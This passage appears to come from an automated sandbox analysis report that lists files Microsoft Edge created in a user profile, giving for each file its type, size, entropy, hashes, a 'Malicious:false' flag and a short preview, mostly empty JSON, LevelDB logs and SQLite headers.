                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):437
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.203865773233833
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:7vvLZYebvqBQFUt8O15/+Ol/54ZYebvqBvJ:7XlYebvZg8O1tLoYebvk
                                                                                                                                                                                                                                                                                                      MD5:1CF4B8A8720D73B7549A2F27C988603A
                                                                                                                                                                                                                                                                                                      SHA1:8A7BE3DE507F3B53E3D45AD0F17EDE1B8E0B2A8B
                                                                                                                                                                                                                                                                                                      SHA-256:E187A283EA821D93F7E5BAB3DC1598A0765BF543DDB3B07D97852907907B6DD0
                                                                                                                                                                                                                                                                                                      SHA-512:F4B40B77819E9046BE9750DC0B1289EEE665213BFD01CAFC9D4EEBD9C2BF4373AC60755E59E36788D0A537D27A0A9B98967BFA4C99A8AAB070A44D07A3682927
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-14:07:40.742 7f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/10-14:07:40.743 7f8 Recovering log #3.2024/12/10-14:07:40.747 7f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):437
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.203865773233833
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:7vvLZYebvqBQFUt8O15/+Ol/54ZYebvqBvJ:7XlYebvZg8O1tLoYebvk
                                                                                                                                                                                                                                                                                                      MD5:1CF4B8A8720D73B7549A2F27C988603A
                                                                                                                                                                                                                                                                                                      SHA1:8A7BE3DE507F3B53E3D45AD0F17EDE1B8E0B2A8B
                                                                                                                                                                                                                                                                                                      SHA-256:E187A283EA821D93F7E5BAB3DC1598A0765BF543DDB3B07D97852907907B6DD0
                                                                                                                                                                                                                                                                                                      SHA-512:F4B40B77819E9046BE9750DC0B1289EEE665213BFD01CAFC9D4EEBD9C2BF4373AC60755E59E36788D0A537D27A0A9B98967BFA4C99A8AAB070A44D07A3682927
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-14:07:40.742 7f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/10-14:07:40.743 7f8 Recovering log #3.2024/12/10-14:07:40.747 7f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\1562fc07-527e-4c0c-8762-294fdb242227.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\84c0306f-063d-437e-842d-73212bc08585.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF26bfe.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                      MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                      SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                      SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                      SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\b58cf5b0-089e-445c-adb0-a96c0eebdfc4.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                      MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                      SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                      SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                      SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):425
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.234704999581046
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:7jvvLZYebvqBZFUt8OgZ/+OB/54ZYebvqBaJ:7rlYebvyg8OcnoYebvL
                                                                                                                                                                                                                                                                                                      MD5:E63E5167E8630AD98D1646CA0123429B
                                                                                                                                                                                                                                                                                                      SHA1:B0247C985032A50B407EFA7897D2D04CB7C78053
                                                                                                                                                                                                                                                                                                      SHA-256:CA9198CE98CDEC09FB686B27150DCCF52AE5B7F9FF0153F44F7683552F474AE8
                                                                                                                                                                                                                                                                                                      SHA-512:40867505D8968457BA5E6320C861B9ADF7A986CF6A3EE25DC37B065CDF8D07693892962A8EE02ED2EF86998BB70081C78C4DB9CC4BA20034377EAE5ABCC5A208
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-14:07:58.882 7f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/10-14:07:58.884 7f8 Recovering log #3.2024/12/10-14:07:58.887 7f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):425
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.234704999581046
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:7jvvLZYebvqBZFUt8OgZ/+OB/54ZYebvqBaJ:7rlYebvyg8OcnoYebvL
                                                                                                                                                                                                                                                                                                      MD5:E63E5167E8630AD98D1646CA0123429B
                                                                                                                                                                                                                                                                                                      SHA1:B0247C985032A50B407EFA7897D2D04CB7C78053
                                                                                                                                                                                                                                                                                                      SHA-256:CA9198CE98CDEC09FB686B27150DCCF52AE5B7F9FF0153F44F7683552F474AE8
                                                                                                                                                                                                                                                                                                      SHA-512:40867505D8968457BA5E6320C861B9ADF7A986CF6A3EE25DC37B065CDF8D07693892962A8EE02ED2EF86998BB70081C78C4DB9CC4BA20034377EAE5ABCC5A208
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-14:07:58.882 7f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/10-14:07:58.884 7f8 Recovering log #3.2024/12/10-14:07:58.887 7f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):334
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.213316443475351
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:728mjyq2PcNwi23oH+TcwtpIFUt8O2d6z1Zmw+O2d6lRkwOcNwi23oH+Tcwta/Wd:7xeyvLZYebmFUt8O66Z/+O66lR54ZYev
                                                                                                                                                                                                                                                                                                      MD5:740A4880DEAF67E9274364B8CA81D6C6
                                                                                                                                                                                                                                                                                                      SHA1:2DFC4367CBA7D33BF81101C555660CEC14BE95DE
                                                                                                                                                                                                                                                                                                      SHA-256:0E56F15C0B02F654DCB25E0D3AD75497A7CF41D106D7B1A6CF6CCE806A5C19BF
                                                                                                                                                                                                                                                                                                      SHA-512:85ACBF5AF99FBB7C78CADF43F1540C89DAD4B30005BFBA62D41E88D5AE1845927640D22934BFA4AE331E01EC5A94CD6698EECE74E8788B0EE3AF2FDA7C95D5E1
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:31.487 1570 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/10-12:41:31.488 1570 Recovering log #3.2024/12/10-12:41:31.488 1570 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):334
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.213316443475351
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:728mjyq2PcNwi23oH+TcwtpIFUt8O2d6z1Zmw+O2d6lRkwOcNwi23oH+Tcwta/Wd:7xeyvLZYebmFUt8O66Z/+O66lR54ZYev
                                                                                                                                                                                                                                                                                                      MD5:740A4880DEAF67E9274364B8CA81D6C6
                                                                                                                                                                                                                                                                                                      SHA1:2DFC4367CBA7D33BF81101C555660CEC14BE95DE
                                                                                                                                                                                                                                                                                                      SHA-256:0E56F15C0B02F654DCB25E0D3AD75497A7CF41D106D7B1A6CF6CCE806A5C19BF
                                                                                                                                                                                                                                                                                                      SHA-512:85ACBF5AF99FBB7C78CADF43F1540C89DAD4B30005BFBA62D41E88D5AE1845927640D22934BFA4AE331E01EC5A94CD6698EECE74E8788B0EE3AF2FDA7C95D5E1
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:31.487 1570 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/10-12:41:31.488 1570 Recovering log #3.2024/12/10-12:41:31.488 1570 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):131072
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0033616753448762224
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:ImtVuknYDitlkmlt:IiVukYm0m
                                                                                                                                                                                                                                                                                                      MD5:CE85F7C6F05CC48C8BD7774BE1A2BBFE
                                                                                                                                                                                                                                                                                                      SHA1:FA2DD1EF241E76252992FC0A019879323ACA0296
                                                                                                                                                                                                                                                                                                      SHA-256:266AE3EB0534306D20DA71BBA9EF2A7EC6F458B5F8C782EF737A3C48CCAAAC60
                                                                                                                                                                                                                                                                                                      SHA-512:53866DD720981F73A5F7636660D443639E8A2122668C557F8A95712087BAA6F6C5091FB42581FB3B60126B635E899C2AB8EC22247912A00C91F47E13931EF317
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:VLnk.....?......[.}..'Z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.2651754398683708
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:384:KrJ/2qOB1nxCkMoSAELyKOMq+8HKkjucswRv8p3nVumm:K0q+n0Jo9ELyKOMq+8HKkjuczRv89q
                                                                                                                                                                                                                                                                                                      MD5:2EEE8F5BDEF0CD0C0668BCFF1606176D
                                                                                                                                                                                                                                                                                                      SHA1:F6E8346AF0218C43D2EF65E4AD8A688BBF2500E2
                                                                                                                                                                                                                                                                                                      SHA-256:232A8C9D2E23F5C62BA9090081B0A52992C7A3E47D3D1449D322C4294D4A3D71
                                                                                                                                                                                                                                                                                                      SHA-512:8FEC4FF07FE9F8CA5692625F30D920313E6E85B92D06CAD7E3FCBE4998BC3726F14B36A4AC488653F8CD55AF714BB0623B2EB25A88FD2A1960E860058B279C4F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data-journal

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2568
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.06569804787746028
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:t9l1l3/PlB:t//P
                                                                                                                                                                                                                                                                                                      MD5:15B708FDF12445E6BCA2497492F31038
